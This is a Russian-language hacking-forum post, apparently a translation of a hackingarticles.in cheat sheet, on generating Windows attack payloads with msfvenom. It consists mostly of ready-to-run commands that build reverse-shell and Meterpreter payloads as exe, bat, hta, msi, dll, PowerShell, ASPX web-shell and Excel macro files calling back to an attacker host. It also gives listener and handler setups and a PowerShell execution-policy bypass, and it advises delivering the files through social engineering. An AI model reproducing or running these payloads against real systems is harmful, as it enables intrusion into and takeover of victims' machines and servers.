• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Шпаргалка по Msfvenom: Эксплуатация в Windows

yashechka

Генератор контента.Фанат Ильфака и Рикардо Нарвахи
Эксперт
Регистрация
24.11.2012
Сообщения
2 344
Реакции
3 563
В этом посте вы узнаете, как использовать MsfVenom для создания всех типов Пейлодов для эксплуатации платформы Windows. Прочтите руководство для начинающих отсюда (https://www.hackingarticles.in/msfvenom-tutorials-beginners/)

Требования:


- Кали Linux
- Windows машина

Синтаксис MsfVenom

MsfVenom - это автономный генератор полезной нагрузки Metasploit, который также является заменой msfpayload и msfencode.

1641547286917.png


Пейлоды и их типы


Полезная нагрузка - это вредоносные сценарии, которые злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезной нагрузки. Формат вывода может быть в виде исполняемых файлов, таких как exe, php, dll, или в виде однострочного файла.

Два основных типа полезной нагрузки

- Стейджер: они обычно обозначаются вторым слешем (/), например windows/meterpreter/reverse_tcp.

- СтейджерЛесс: используют нижнее подчеркивание (_) вместо второго (/) в имени полезной нагрузки, например windows/meterpreter_reverse_tcp
1641547323031.png


Как мы уже упоминали выше, этот пост может помочь вам изучить все возможные методы создания различных форматов полезной нагрузки для эксплуатации платформы Windows.

Исполняемая полезная нагрузка (exe)

Тип полезной нагрузки: Stager


Выполнение следующей команды для создания вредоносного exe-файла - это распространенное расширение имени файла, обозначающее исполняемый файл для Microsoft Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe

Весь вредоносный код будет записан внутри файла shell.exe и будет выполняться на целевой машине как исполняемая программа.

1641547350531.png


Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения файда. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.

nc –lvp 443

1641547375652.png


Пакетный файл Powershell

Тип полезной нагрузки: Stager


Выполните следующую команду, чтобы создать вредоносный пакетный файл, расширение имени файла .bat используется в DOS и Windows.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat

Весь вредоносный код будет записан внутри файла shell.bat и будет выполняться как сценарий .bat на целевой машине.

1641547417915.png


Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения на цели. Тем временем запустите netcat в качестве прослушивателя для перехвата реверс соединения.

nc –lvp 443

1641547430891.png


Пейлод HTML (HTA)

Тип полезной нагрузки: Stager


Приложение HTML (HTA) - это программа Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков сценариев, поддерживаемых Internet Explorer, например VBScript или JScript.

Выполните следующую команду, чтобы создать вредоносный файл HTA, расширение файла .hta используется в DOS и Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta


Весь вредоносный код будет записан внутри файла shell.hta и будет выполняться как сценарий .hta на целевой машине. Используйте HTTP-сервер Python для обмена файлами.

1641547458048.png


mshta http://192.168.1.3/shell.hta

HTA выполняется с помощью программы mshta.exe или двойным щелчком по файлу.

1641547476881.png


Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.

nc –lvp 443

1641547500698.png


Пейлод установщика Microsoft (MSI)

Установщик Windows также известен как установщик Microsoft. Файл MSI - это пакет Windows, который предоставляет информацию об установке для определенного установщика, например программы, которые необходимо установить. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения, такого же как exe.

Выполните следующую команду, чтобы создать вредоносный файл MSI, расширение имени файла .msi используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi

1641547517061.png


Используйте команду msiexec для запуска файла MSI.

msiexec /quiet /qn /i shell.msi

1641547531172.png


Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.
1641547543355.png


Полезная нагрузка библиотеки динамической компоновки (DLL)

Тип полезной нагрузки: Stager


DLL - это библиотека, содержащая код и данные, которые могут использоваться более чем одной программой.

Выполните следующую команду, чтобы создать вредоносный файл DLL, расширение файла .dll используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

1641547568652.png


Используйте команду rundll32 для запуска файла MSI.

rundll32.exe shell.dll,0

Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.

1641547582266.png


Пейлоад Powershell (psh-cmd)

Тип полезной нагрузки: Stager

Формат - psh, psh-net, psh-reflection или psh-cmd.


Сгенерированная полезная нагрузка для форматов psh, psh-net и psh-reflection имеет расширение .ps1, а сгенерированная полезная нагрузка для формата psh-cmd имеет расширение .cmd. В противном случае вы можете напрямую выполнить необработанный код внутри командной строки целевая система.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw


Выполните следующую команду, чтобы сгенерировать сырой код для вредоносной программы PowerShell.

1641547604615.png


Для выполнения скопируйте сгенерированный код и вставьте его в командную строку Windows.

Это приведет к реверс соединению через прослушиватель netcat, который работает в фоновом режиме для перехвата реверс соединения.

1641547614309.png


Полезная нагрузка Powershell (ps1)

Тип полезной нагрузки: Stager


Файл PS1 - это сценарий или "командлет", используемый Windows PowerShell. Файлы PS1 похожи на файлы .BAT и .CMD, за исключением того, что они выполняются в Windows PowerShell вместо командной строки Windows.

Выполните следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла. PS1 используется в Windows PowerShell.

msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1

Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка Metasploit.

1641547639117.png


Политика выполнения PowerShell - это функция безопасности, которая контролирует условия, при которых PowerShell загружает файлы конфигурации и запускает сценарии. Эта функция помогает предотвратить выполнение вредоносных скриптов. Запрещает запуск всех файлов сценариев, включая файлы форматирования и конфигурации (.ps1xml), файлы сценариев модулей (.psm1) и профили PowerShell (.ps1).

Подробнее читайте здесь (https://docs.microsoft.com/en-us/po.../about_execution_policies?view=powershell-7.2)

Чтобы выполнить сценарий PS1, вам необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и выполнив сценарий.

PowerShell –ep bypass
.\shell.ps1

1641547657215.png


msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https


Как только цель выполнит сценарий shell.ps1, злоумышленник получит реверс соединение через сеанс метерпредставителя.

1641547681192.png


Полезная нагрузка веб-оболочки (ASPX)

Тип полезной нагрузки: стейджлесс


Файл ASPX - это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса эти страницы отображаются в веб-браузере пользователя. Другое название для них - веб-формы .NET.

Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением файла .aspx.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx

Поскольку реверс тип оболочки - meterpreter, нам нужно запустить exploit/multi/handler внутри фреймворка metasploit.

1641547700722.png


Вы можете внедрить эту полезную нагрузку для использования уязвимости неограниченной загрузки файлов, если целью является веб-сервер IIS. (https://www.hackingarticles.in/comprehensive-guide-on-unrestricted-file-upload/)

1641547707777.png


Выполните сценарий загрузки в веб-браузере.

1641547715204.png


msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https


Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.

1641547731527.png


Пейлоад Visual Basic (.vba)

Тип полезной нагрузки: стейджлесс


VBA - это расширение файла, обычно связанное с Visual Basic, которое поддерживает такие приложения Microsoft, как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания "макросов" которые работают в Excel. Злоумышленник пользуется привилегиями этих функций и создает вредоносный сценарий VB, который будет выполняться как программа макросов с Microsoft Excel.

Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением имени файла .aspx, который будет выполняться как макрос в Microsoft Excel.

Подробнее читайте здесь: (https://www.hackingarticles.in/multiple-ways-to-exploit-windows-systems-using-macros/)

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba

1641547777296.png


Теперь мы открываем наш Воркбук, в которую внедрены вредоносные макросы. Комплексный метод выполнения макросов объяснен в нашем предыдущем посте.

1641547787315.png


use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit


Как только злоумышленник выполнит вредоносный скрипт, он получит реверс соединение через сессию метерпретера.

1641547801947.png


Переведено специально для xss.pro
Автор перевода: yashechka
Источник: https://www.hackingarticles.in/msfvenom-cheatsheet-windows-exploitation/
 

Вложения

  • 1641547403081.png
    1641547403081.png
    16.8 КБ · Просмотры: 3
  • 1641547411142.png
    1641547411142.png
    16.8 КБ · Просмотры: 3
  • 1641547486459.png
    1641547486459.png
    3.2 КБ · Просмотры: 3


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх